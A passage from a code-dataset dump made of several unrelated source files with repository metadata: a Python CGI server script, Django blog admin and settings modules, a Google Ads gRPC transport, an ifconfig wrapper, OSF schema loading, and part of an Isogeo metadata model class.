class ThreadingCGIServer( SocketServer.ThreadingMixIn, BaseHTTPServer.HTTPServer):
pass
# set os separator
try:
os_sep = os.path.os.sep
False = 0
True = 1
except:
try:
os_sep = os.path.sep
except:
print("ERROR: can not set os.separator, exiting...")
sys.exit(-1)
# set rootdir
currdir = os.getcwd()
# rootdir = currdir + os_sep + 'data'
# if ( os.path.exists( rootdir)): os.chdir( rootdir)
# start HTTP Server
server = ThreadingCGIServer( ('', port), CGIHTTPServer.CGIHTTPRequestHandler)
print "Server started on port %s." % port
try:
while 1:
sys.stdout.flush()
server.handle_request()
except keyboardInterrupt:
if ( os.path.exists( currdir)): os.chdir( currdir)
print "Server stopped."
|
mit
| 3,394,831,740,184,228,400
| 24.190476
| 82
| 0.608066
| false
| 3.348101
| false
| false
| false
|
sylvainnizac/Djangoctopus
|
blog/admin.py
|
1
|
2774
|
# -*- coding: utf8 -*-
from django.contrib import admin
from blog.models import Categorie, Article, Comment
class ArticleAdmin(admin.ModelAdmin):
list_display = ('titre', 'auteur', 'date', 'categorie', 'apercu_contenu')
list_filter = ('auteur','categorie',)
date_hierarchy = 'date'
ordering = ('-date', )
search_fields = ('titre', 'contenu')
prepopulated_fields = {"slug": ("titre",)}
# Configuration du formulaire d'édition
fieldsets = (
# Fieldset 1 : meta-info (titre, auteur…)
('Général',
{'fields': ('titre', 'slug', 'auteur', 'categorie')
}),
# Fieldset 2 : contenu de l'article
('Contenu de l\'article',
{ 'description': 'Le formulaire accepte les balises HTML. Utilisez-les à bon escient !',
'fields': ('contenu', )
}),
)
def apercu_contenu(self, article):
"""
Retourne les 40 premiers caractères du contenu de l'article. S'il
y a plus de 40 caractères, il faut ajouter des points de suspension.
"""
text = article.contenu[0:40]
if len(article.contenu) > 40:
return '%s...' % text
else:
return text
# En-tête de notre colonne
apercu_contenu.short_description = 'Aperçu du contenu'
class CommentsAdmin(admin.ModelAdmin):
list_display = ('pseudo', 'email', 'article', 'apercu_description', 'date', 'commentaire_visible')
list_filter = ('pseudo', 'article', 'email', )
date_hierarchy = 'date'
ordering = ('-date', )
search_fields = ('pseudo', 'email', 'article', )
# Configuration du formulaire d'édition
fieldsets = (
# Fieldset 1 : meta-info (titre, auteur…)
('Général',
{'fields': ('pseudo', 'email'), }),
# Fieldset 2 : contenu de l'article
('Commentaire',
{ 'description': 'Le formulaire n\'accepte pas les balises HTML.',
'fields': ('description', )}),
# Fieldset 3 : modération
('Modération',
{ 'fields': ('commentaire_visible', )}),
)
def apercu_description(self, commentaire):
"""
Retourne les 40 premiers caractères du contenu du commentaire. S'il
y a plus de 40 caractères, il faut ajouter des points de suspension.
"""
text = commentaire.description[0:40]
if len(commentaire.description) > 40:
return '%s...' % text
else:
return text
# En-tête de notre colonne
apercu_description.short_description = 'Aperçu du commentaire'
# Register your models here.
admin.site.register(Categorie)
admin.site.register(Article, ArticleAdmin)
admin.site.register(Comment, CommentsAdmin)
|
gpl-2.0
| -2,033,523,279,121,713,400
| 33.848101
| 104
| 0.587722
| false
| 3.407178
| false
| false
| false
|
googleapis/googleapis-gen
|
google/ads/googleads/v6/googleads-py/google/ads/googleads/v6/services/services/media_file_service/transports/grpc.py
|
1
|
11285
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Callable, Dict, Optional, Sequence, Tuple
from google.api_core import grpc_helpers # type: ignore
from google.api_core import gapic_v1 # type: ignore
import google.auth # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import grpc # type: ignore
from google.ads.googleads.v6.resources.types import media_file
from google.ads.googleads.v6.services.types import media_file_service
from .base import MediaFileServiceTransport, DEFAULT_CLIENT_INFO
class MediaFileServiceGrpcTransport(MediaFileServiceTransport):
"""gRPC backend transport for MediaFileService.
Service to manage media files.
This class defines the same methods as the primary client, so the
primary client can load the underlying transport implementation
and call it.
It sends protocol buffers over the wire using gRPC (which is built on
top of HTTP/2); the ``grpcio`` package must be installed.
"""
def __init__(self, *,
host: str = 'googleads.googleapis.com',
credentials: ga_credentials.Credentials = None,
credentials_file: str = None,
scopes: Sequence[str] = None,
channel: grpc.Channel = None,
api_mtls_endpoint: str = None,
client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
ssl_channel_credentials: grpc.ChannelCredentials = None,
quota_project_id: Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is ignored if ``channel`` is provided.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
scopes (Optional(Sequence[str])): A list of scopes. This argument is
ignored if ``channel`` is provided.
channel (Optional[grpc.Channel]): A ``Channel`` instance through
which to make calls.
api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
If provided, it overrides the ``host`` argument and tries to create
a mutual TLS channel with client SSL credentials from
``client_cert_source`` or applicatin default SSL credentials.
client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
Deprecated. A callback to provide client SSL certificate bytes and
private key bytes, both in PEM format. It is ignored if
``api_mtls_endpoint`` is None.
ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
for grpc channel. It is ignored if ``channel`` is provided.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
self._ssl_channel_credentials = ssl_channel_credentials
if channel:
# Sanity check: Ensure that channel and credentials are not both
# provided.
credentials = False
# If a channel was explicitly provided, set it.
self._grpc_channel = channel
self._ssl_channel_credentials = None
elif api_mtls_endpoint:
warnings.warn("api_mtls_endpoint and client_cert_source are deprecated", DeprecationWarning)
host = api_mtls_endpoint if ":" in api_mtls_endpoint else api_mtls_endpoint + ":443"
if credentials is None:
credentials, _ = google.auth.default(scopes=self.AUTH_SCOPES, quota_project_id=quota_project_id)
# Create SSL credentials with client_cert_source or application
# default SSL credentials.
if client_cert_source:
cert, key = client_cert_source()
ssl_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
else:
ssl_credentials = SslCredentials().ssl_credentials
# create a new channel. The provided one is ignored.
self._grpc_channel = type(self).create_channel(
host,
credentials=credentials,
credentials_file=credentials_file,
ssl_credentials=ssl_credentials,
scopes=scopes or self.AUTH_SCOPES,
quota_project_id=quota_project_id,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
self._ssl_channel_credentials = ssl_credentials
else:
host = host if ":" in host else host + ":443"
if credentials is None:
credentials, _ = google.auth.default(scopes=self.AUTH_SCOPES)
# create a new channel. The provided one is ignored.
self._grpc_channel = type(self).create_channel(
host,
credentials=credentials,
ssl_credentials=ssl_channel_credentials,
scopes=self.AUTH_SCOPES,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
self._stubs = {} # type: Dict[str, Callable]
# Run the base constructor.
super().__init__(
host=host,
credentials=credentials,
client_info=client_info,
)
@classmethod
def create_channel(cls,
host: str = 'googleads.googleapis.com',
credentials: ga_credentials.Credentials = None,
scopes: Optional[Sequence[str]] = None,
**kwargs) -> grpc.Channel:
"""Create and return a gRPC channel object.
Args:
address (Optionsl[str]): The host for the channel to use.
credentials (Optional[~.Credentials]): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
kwargs (Optional[dict]): Keyword arguments, which are passed to the
channel creation.
Returns:
grpc.Channel: A gRPC channel object.
"""
return grpc_helpers.create_channel(
host,
credentials=credentials,
scopes=scopes or cls.AUTH_SCOPES,
**kwargs
)
@property
def grpc_channel(self) -> grpc.Channel:
"""Return the channel designed to connect to this service.
"""
return self._grpc_channel
@property
def get_media_file(self) -> Callable[
[media_file_service.GetMediaFileRequest],
media_file.MediaFile]:
r"""Return a callable for the get media file method over gRPC.
Returns the requested media file in full detail.
Returns:
Callable[[~.GetMediaFileRequest],
~.MediaFile]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'get_media_file' not in self._stubs:
self._stubs['get_media_file'] = self.grpc_channel.unary_unary(
'/google.ads.googleads.v6.services.MediaFileService/GetMediaFile',
request_serializer=media_file_service.GetMediaFileRequest.serialize,
response_deserializer=media_file.MediaFile.deserialize,
)
return self._stubs['get_media_file']
@property
def mutate_media_files(self) -> Callable[
[media_file_service.MutateMediaFilesRequest],
media_file_service.MutateMediaFilesResponse]:
r"""Return a callable for the mutate media files method over gRPC.
Creates media files. Operation statuses are returned.
Returns:
Callable[[~.MutateMediaFilesRequest],
~.MutateMediaFilesResponse]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'mutate_media_files' not in self._stubs:
self._stubs['mutate_media_files'] = self.grpc_channel.unary_unary(
'/google.ads.googleads.v6.services.MediaFileService/MutateMediaFiles',
request_serializer=media_file_service.MutateMediaFilesRequest.serialize,
response_deserializer=media_file_service.MutateMediaFilesResponse.deserialize,
)
return self._stubs['mutate_media_files']
__all__ = (
'MediaFileServiceGrpcTransport',
)
|
apache-2.0
| -4,525,491,664,470,927,400
| 43.254902
| 112
| 0.608773
| false
| 4.725712
| false
| false
| false
|
derv82/wifite2
|
wifite/tools/ifconfig.py
|
1
|
1784
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import re
from .dependency import Dependency
class Ifconfig(Dependency):
dependency_required = True
dependency_name = 'ifconfig'
dependency_url = 'apt-get install net-tools'
@classmethod
def up(cls, interface, args=[]):
'''Put interface up'''
from ..util.process import Process
command = ['ifconfig', interface]
if type(args) is list:
command.extend(args)
elif type(args) is 'str':
command.append(args)
command.append('up')
pid = Process(command)
pid.wait()
if pid.poll() != 0:
raise Exception('Error putting interface %s up:\n%s\n%s' % (interface, pid.stdout(), pid.stderr()))
@classmethod
def down(cls, interface):
'''Put interface down'''
from ..util.process import Process
pid = Process(['ifconfig', interface, 'down'])
pid.wait()
if pid.poll() != 0:
raise Exception('Error putting interface %s down:\n%s\n%s' % (interface, pid.stdout(), pid.stderr()))
@classmethod
def get_mac(cls, interface):
from ..util.process import Process
output = Process(['ifconfig', interface]).stdout()
# Mac address separated by dashes
mac_dash_regex = ('[a-zA-Z0-9]{2}-' * 6)[:-1]
match = re.search(' ({})'.format(mac_dash_regex), output)
if match:
return match.group(1).replace('-', ':')
# Mac address separated by colons
mac_colon_regex = ('[a-zA-Z0-9]{2}:' * 6)[:-1]
match = re.search(' ({})'.format(mac_colon_regex), output)
if match:
return match.group(1)
raise Exception('Could not find the mac address for %s' % interface)
|
gpl-2.0
| 4,402,937,286,454,165,000
| 28.245902
| 113
| 0.568946
| false
| 3.90372
| false
| false
| false
|
HalcyonChimera/osf.io
|
website/project/metadata/schemas.py
|
1
|
2265
|
import os
import json
LATEST_SCHEMA_VERSION = 2
def _id_to_name(id):
return ' '.join(id.split('_'))
def _name_to_id(name):
return '_'.join(name.split(' '))
def ensure_schema_structure(schema):
schema['pages'] = schema.get('pages', [])
schema['title'] = schema['name']
schema['version'] = schema.get('version', 1)
schema['active'] = schema.get('active', True)
return schema
here = os.path.split(os.path.abspath(__file__))[0]
def from_json(fname):
with open(os.path.join(here, fname)) as f:
return json.load(f)
OSF_META_SCHEMAS = [
ensure_schema_structure(from_json('osf-open-ended-1.json')),
ensure_schema_structure(from_json('osf-open-ended-2.json')),
ensure_schema_structure(from_json('osf-standard-1.json')),
ensure_schema_structure(from_json('osf-standard-2.json')),
ensure_schema_structure(from_json('brandt-prereg-1.json')),
ensure_schema_structure(from_json('brandt-prereg-2.json')),
ensure_schema_structure(from_json('brandt-postcomp-1.json')),
ensure_schema_structure(from_json('brandt-postcomp-2.json')),
ensure_schema_structure(from_json('prereg-prize.json')),
ensure_schema_structure(from_json('erpc-prize.json')),
ensure_schema_structure(from_json('confirmatory-general-2.json')),
ensure_schema_structure(from_json('egap-project-2.json')),
ensure_schema_structure(from_json('veer-1.json')),
ensure_schema_structure(from_json('aspredicted.json')),
ensure_schema_structure(from_json('registered-report.json')),
ensure_schema_structure(from_json('ridie-initiation.json')),
ensure_schema_structure(from_json('ridie-complete.json')),
]
METASCHEMA_ORDERING = (
'Prereg Challenge',
'Open-Ended Registration',
'Preregistration Template from AsPredicted.org',
'Registered Report Protocol Preregistration',
'OSF-Standard Pre-Data Collection Registration',
'Replication Recipe (Brandt et al., 2013): Pre-Registration',
'Replication Recipe (Brandt et al., 2013): Post-Completion',
"Pre-Registration in Social Psychology (van 't Veer & Giner-Sorolla, 2016): Pre-Registration",
'Election Research Preacceptance Competition',
'RIDIE Registration - Study Initiation',
'RIDIE Registration - Study Complete',
)
|
apache-2.0
| 8,412,698,295,121,021,000
| 38.736842
| 98
| 0.696247
| false
| 3.296943
| false
| false
| false
|
ashbc/tgrsite
|
tgrsite/settings.py
|
1
|
6161
|
"""
Django settings for tgrsite project.
Generated by 'django-admin startproject' using Django 1.10.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
import django.contrib.messages.constants as message_constants
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
from django.urls import reverse_lazy
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
ADMINS = [('Webadmin', 'webadmin@warwicktabletop.co.uk')]
MANAGERS = [('Webadmin', 'webadmin@warwicktabletop.co.uk')]
LOGIN_URL = '/login/'
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = os.environ.get('EMAIL_HOST', 'localhost')
EMAIL_PORT = os.environ.get('EMAIL_PORT', 587)
EMAIL_HOST_USER = os.environ.get('EMAIL_HOST_USER', '')
EMAIL_HOST_PASSWORD = os.environ.get('EMAIL_HOST_PASSWORD', '')
EMAIL_USE_TLS = True
DEFAULT_FROM_EMAIL = os.environ.get('FROM_EMAIL', 'webmaster@localhost')
s = ''
try:
from .keys import secret
s = secret()
except:
# this will throw a KeyError and crash if neither are specified
# which is a decent enough way of enforcing it
s = os.environ['SECRET_KEY']
SECRET_KEY = s
# Defaults off unless explicitly stated in environment variable
try:
if os.environ['DEBUG'].lower() == 'true':
DEBUG = True
else:
DEBUG = False
except KeyError:
DEBUG = False
# needs 127 to work on my machine...
ALLOWED_HOSTS = [os.environ.get('HOST', 'localhost'), '127.0.0.1']
PRIMARY_HOST = '127.0.0.1:8000'
if DEBUG:
from .ipnetworks import IpNetworks
INTERNAL_IPS = IpNetworks(['127.0.0.1', '192.168.0.0/255.255.0.0'])
else:
INTERNAL_IPS = ['127.0.0.1']
INSTALLED_APPS = [
'website_settings',
'navbar',
'assets',
'minutes',
'inventory',
'forum',
'users',
'rpgs',
'exec',
'templatetags',
'timetable',
'messaging',
'gallery',
'pages',
'newsletters',
'notifications',
'crispy_forms',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.humanize',
'redirect'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'tgrsite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'tgrsite/templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'tgrsite.context_processors.latestposts',
'tgrsite.context_processors.mergednavbar'
],
},
},
]
WSGI_APPLICATION = 'tgrsite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
AUTHENTICATION_BACKENDS = [
'users.backends.CaseInsensitiveModelBackend',
# 'django.contrib.auth.backends.ModelBackend',
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-gb'
USE_I18N = True
USE_L10N = True
# Europe/London means GMT+0 with a DST offset of +1:00 i.e. England time
TIME_ZONE = 'Europe/London'
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
# site URL that static files are served from
STATIC_URL = '/static/'
LOGIN_REDIRECT_URL=reverse_lazy("homepage")
# directories to collect static files from
STATICFILES_DIRS = [
# where the static files are stored in the repo and collected from
os.path.join(BASE_DIR, 'static_resources'),
]
# directory the static files are served from
STATIC_ROOT = os.path.join(BASE_DIR, 'STATIC')
# directories for the uploaded files
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'MEDIA')
# Monday
FIRST_DAY_OF_WEEK = 1
# Setup Cripsy to render forms bootstrap4ish
CRISPY_TEMPLATE_PACK = 'bootstrap4'
# as advised by python manage.py check --deploy
# prevent browsers from MIME type sniffing. doesn't play nice
# SECURE_CONTENT_TYPE_NOSNIFF=True
# enable browsers' XSS filters
SECURE_BROWSER_XSS_FILTER = True
# ensure all traffic is SSL (https)
SECURE_SSL_REDIRECT = not DEBUG
# session cookies secure-only
SESSION_COOKIE_SECURE = not DEBUG
# same for CSRF cookie
CSRF_COOKIE_SECURE = not DEBUG
# CSRF_COOKIE_HTTPONLY=True
X_FRAME_OPTIONS = 'DENY'
MESSAGE_TAGS = {
message_constants.DEBUG: 'alert-dark',
message_constants.INFO: 'alert-primary',
message_constants.SUCCESS: 'alert-success',
message_constants.WARNING: 'alert-warning',
message_constants.ERROR: 'alert-danger',
}
# Allow local configuration (change deploy options etc.)
try:
from .local_config import *
except ImportError:
pass
|
isc
| -7,394,605,813,598,171,000
| 26.382222
| 91
| 0.687226
| false
| 3.42468
| false
| false
| false
|
Guts/isogeo-api-py-minsdk
|
isogeo_pysdk/models/metadata.py
|
1
|
38320
|
# -*- coding: UTF-8 -*-
#! python3
"""
Isogeo API v1 - Model of Metadata (= Resource) entity
See: http://help.isogeo.com/api/complete/index.html#definition-resource
"""
# #############################################################################
# ########## Libraries #############
# ##################################
# standard library
import logging
import pprint
import re
import unicodedata
# package
from isogeo_pysdk.enums import MetadataSubresources, MetadataTypes
# others models
from isogeo_pysdk.models import Workgroup
# #############################################################################
# ########## Globals ###############
# ##################################
logger = logging.getLogger(__name__)
# for slugified title
_regex_slugify_strip = re.compile(r"[^\w\s-]")
_regex_slugify_hyphenate = re.compile(r"[-\s]+")
# #############################################################################
# ########## Classes ###############
# ##################################
class Metadata(object):
"""Metadata are the main entities in Isogeo.
:Example:
.. code-block:: json
{
"_abilities": [
"string"
],
"_created": "string (date-time)",
"_creator": {
"_abilities": [
"string"
],
"_created": "string (date-time)",
"_id": "string (uuid)",
"_modified": "string (date-time)",
"areKeywordsRestricted": "boolean",
"canCreateMetadata": "boolean",
"code": "string",
"contact": {
"_created": "string (date-time)",
"_id": "string (uuid)",
"_modified": "string (date-time)",
"addressLine1": "string",
"addressLine2": "string",
"addressLine3": "string",
"available": "string",
"city": "string",
"count": "integer (int32)",
"countryCode": "string",
"email": "string",
"fax": "string",
"hash": "string",
"name": "string",
"organization": "string",
"phone": "string",
"type": "string",
"zipCode": "string"
},
"keywordsCasing": "string",
"metadataLanguage": "string",
"themeColor": "string"
},
"_id": "string (uuid)",
"_modified": "string (date-time)",
"abstract": "string",
"bbox": [
"number (double)"
],
"collectionContext": "string",
"collectionMethod": "string",
"conditions": [
{
"_id": "string (uuid)",
"description": "string",
"license": {
"_id": "string (uuid)",
"content": "string",
"count": "integer (int32)",
"link": "string",
"name": "string"
}
}
],
"contacts": [
{
"_id": "string (uuid)",
"contact": {
"_created": "string (date-time)",
"_id": "string (uuid)",
"_modified": "string (date-time)",
"addressLine1": "string",
"addressLine2": "string",
"addressLine3": "string",
"available": "string",
"city": "string",
"count": "integer (int32)",
"countryCode": "string",
"email": "string",
"fax": "string",
"hash": "string",
"name": "string",
"organization": "string",
"phone": "string",
"type": "string",
"zipCode": "string"
},
"role": "string"
}
],
"context": "object",
"coordinate-system": "object",
"created": "string (date-time)",
"distance": "number (double)",
"editionProfile": "string",
"encoding": "string",
"envelope": "object",
"features": "integer (int32)",
"format": "string",
"formatVersion": "string",
"geometry": "string",
"height": "integer (int32)",
"keywords": [
{}
]
}
"""
# -- ATTRIBUTES --------------------------------------------------------------------
ATTR_TYPES = {
"_abilities": list,
"_created": str,
"_creator": dict,
"_id": str,
"_modified": str,
"abstract": str,
"collectionContext": str,
"collectionMethod": str,
"conditions": list,
"contacts": list,
"coordinateSystem": dict,
"created": str,
"distance": float,
"editionProfile": str,
"encoding": str,
"envelope": dict,
"events": list,
"featureAttributes": list,
"features": int,
"format": str,
"formatVersion": str,
"geometry": str,
"keywords": list,
"language": str,
"layers": list,
"limitations": list,
"links": list,
"modified": str,
"name": str,
"operations": list,
"path": str,
"precision": str,
"published": str,
"scale": int,
"series": bool,
"serviceLayers": list,
"specifications": list,
"tags": list,
"title": str,
"topologicalConsistency": str,
"type": str,
"updateFrequency": str,
"validFrom": str,
"validTo": str,
"validityComment": str,
}
ATTR_CREA = {
"abstract": str,
"collectionContext": str,
"collectionMethod": str,
"distance": float,
"editionProfile": str,
"encoding": str,
"envelope": dict,
"features": int,
"format": str,
"formatVersion": str,
"geometry": str,
"language": str,
"name": str,
"path": str,
"precision": str,
"scale": int,
"series": bool,
"title": str,
"topologicalConsistency": str,
"type": str,
"updateFrequency": str,
"validFrom": str,
"validTo": str,
"validityComment": str,
}
ATTR_MAP = {
"coordinateSystem": "coordinate-system",
"featureAttributes": "feature-attributes",
}
# -- CLASS METHODS -----------------------------------------------------------------
@classmethod
def clean_attributes(cls, raw_object: dict):
"""Renames attributes which are incompatible with Python (hyphens...).
See related issue: https://github.com/isogeo/isogeo-api-py-minsdk/issues/82
:param dict raw_object: metadata dictionary returned by a request.json()
:returns: the metadata with correct attributes
:rtype: Metadata
"""
for k, v in cls.ATTR_MAP.items():
raw_object[k] = raw_object.pop(v, [])
return cls(**raw_object)
# -- CLASS INSTANCIATION -----------------------------------------------------------
def __init__(
self,
_abilities: list = None,
_created: str = None,
_creator: dict = None,
_id: str = None,
_modified: str = None,
abstract: str = None,
collectionContext: str = None,
collectionMethod: str = None,
conditions: list = None,
contacts: list = None,
coordinateSystem: dict = None,
created: str = None,
distance: float = None,
editionProfile: str = None,
encoding: str = None,
envelope: dict = None,
events: list = None,
featureAttributes: list = None,
features: int = None,
format: str = None,
formatVersion: str = None,
geometry: str = None,
keywords: list = None,
language: str = None,
layers: list = None,
limitations: list = None,
links: list = None,
modified: str = None,
name: str = None,
operations: list = None,
path: str = None,
precision: str = None,
published: str = None,
scale: int = None,
series: bool = None,
serviceLayers: list = None,
specifications: list = None,
tags: list = None,
title: str = None,
topologicalConsistency: str = None,
type: str = None,
updateFrequency: str = None,
validFrom: str = None,
validTo: str = None,
validityComment: str = None,
):
"""Metadata model"""
# default values for the object attributes/properties
self.__abilities = None
self.__created = None
self.__creator = None
self.__id = None
self.__modified = None
self._abstract = None
self._collectionContext = None
self._collectionMethod = None
self._conditions = None
self._contacts = None
self._coordinateSystem = None
self._creation = None # = created
self._distance = None
self._editionProfile = None
self._encoding = None
self._envelope = None
self._events = None
self._featureAttributes = None
self._features = None
self._format = None
self._formatVersion = None
self._geometry = None
self._keywords = None
self._language = None
self._layers = None
self._limitations = None
self._links = None
self._modification = None # = modified
self._name = None
self._operations = None
self._path = None
self._precision = None
self._published = None
self._scale = None
self._series = None
self._serviceLayers = None
self._specifications = None
self._tags = None
self._title = None
self._topologicalConsistency = None
self._type = None
self._updateFrequency = None
self._validFrom = None
self._validTo = None
self._validityComment = None
# if values have been passed, so use them as objects attributes.
# attributes are prefixed by an underscore '_'
if _abilities is not None:
self.__abilities = _abilities
if _created is not None:
self.__created = _created
if _creator is not None:
self.__creator = _creator
if _id is not None:
self.__id = _id
if _modified is not None:
self.__modified = _modified
if abstract is not None:
self._abstract = abstract
if collectionContext is not None:
self._collectionContext = collectionContext
if collectionMethod is not None:
self._collectionMethod = collectionMethod
if conditions is not None:
self._conditions = conditions
if contacts is not None:
self._contacts = contacts
if coordinateSystem is not None:
self._coordinateSystem = coordinateSystem
if created is not None:
self._creation = created
if distance is not None:
self._distance = distance
if editionProfile is not None:
self._editionProfile = editionProfile
if encoding is not None:
self._encoding = encoding
if envelope is not None:
self._envelope = envelope
if events is not None:
self._events = events
if featureAttributes is not None:
self._featureAttributes = featureAttributes
if features is not None:
self._features = features
if format is not None:
self._format = format
if formatVersion is not None:
self._formatVersion = formatVersion
if geometry is not None:
self._geometry = geometry
if keywords is not None:
self._keywords = keywords
if language is not None:
self._language = language
if layers is not None:
self._layers = layers
if limitations is not None:
self._limitations = limitations
if links is not None:
self._links = links
if modified is not None:
self._modification = modified
if name is not None:
self._name = name
if operations is not None:
self._operations = operations
if path is not None:
self._path = path
if precision is not None:
self._precision = precision
if published is not None:
self._published = published
if scale is not None:
self._scale = scale
if serviceLayers is not None:
self._serviceLayers = serviceLayers
if specifications is not None:
self._specifications = specifications
if tags is not None:
self._tags = tags
if title is not None:
self._title = title
if topologicalConsistency is not None:
self._topologicalConsistency = topologicalConsistency
if type is not None:
self._type = type
if updateFrequency is not None:
self._updateFrequency = updateFrequency
if validFrom is not None:
self._validFrom = validFrom
if validTo is not None:
self._validTo = validTo
if validityComment is not None:
self._validityComment = validityComment
# -- PROPERTIES --------------------------------------------------------------------
# abilities of the user related to the metadata
@property
def _abilities(self) -> list:
"""Gets the abilities of this Metadata.
:return: The abilities of this Metadata.
:rtype: list
"""
return self.__abilities
# _created
@property
def _created(self) -> str:
"""Gets the creation datetime of the Metadata.
Datetime format is: `%Y-%m-%dT%H:%M:%S+00:00`.
:return: The created of this Metadata.
:rtype: str
"""
return self.__created
# _modified
@property
def _modified(self) -> str:
"""Gets the last modification datetime of this Metadata.
Datetime format is: `%Y-%m-%dT%H:%M:%S+00:00`.
:return: The modified of this Metadata.
:rtype: str
"""
return self.__modified
# metadata owner
@property
def _creator(self) -> dict:
"""Gets the creator of this Metadata.
:return: The creator of this Metadata.
:rtype: dict
"""
return self.__creator
# metadata UUID
@property
def _id(self) -> str:
"""Gets the id of this Metadata.
:return: The id of this Metadata.
:rtype: str
"""
return self.__id
@_id.setter
def _id(self, _id: str):
"""Sets the id of this Metadata.
:param str id: The id of this Metadata.
"""
self.__id = _id
# metadata description
@property
def abstract(self) -> str:
"""Gets the abstract.
:return: The abstract of this Metadata.
:rtype: str
"""
return self._abstract
@abstract.setter
def abstract(self, abstract: str):
"""Sets the abstract used into Isogeo filters of this Metadata.
:param str abstract: the abstract of this Metadata.
"""
self._abstract = abstract
# collection context
@property
def collectionContext(self) -> str:
"""Gets the collectionContext of this Metadata.
:return: The collectionContext of this Metadata.
:rtype: str
"""
return self._collectionContext
@collectionContext.setter
def collectionContext(self, collectionContext: str):
"""Sets the collection context of this Metadata.
:param str collectionContext: The collection context of this Metadata.
"""
self._collectionContext = collectionContext
# collection method
@property
def collectionMethod(self) -> str:
"""Gets the collection method of this Metadata.
:return: The collection method of this Metadata.
:rtype: str
"""
return self._collectionMethod
@collectionMethod.setter
def collectionMethod(self, collectionMethod: str):
"""Sets the collection method of this Metadata.
:param str collectionMethod: the collection method to set. Accepts markdown.
"""
self._collectionMethod = collectionMethod
# CGUs
@property
def conditions(self) -> list:
"""Gets the conditions of this Metadata.
:return: The conditions of this Metadata.
:rtype: list
"""
return self._conditions
@conditions.setter
def conditions(self, conditions: list):
"""Sets conditions of this Metadata.
:param list conditions: conditions to be set
"""
self._conditions = conditions
# contacts
@property
def contacts(self) -> list:
"""Gets the contacts of this Metadata.
:return: The contacts of this Metadata.
:rtype: list
"""
return self._contacts
@contacts.setter
def contacts(self, contacts: list):
"""Sets the of this Metadata.
:param list contacts: to be set
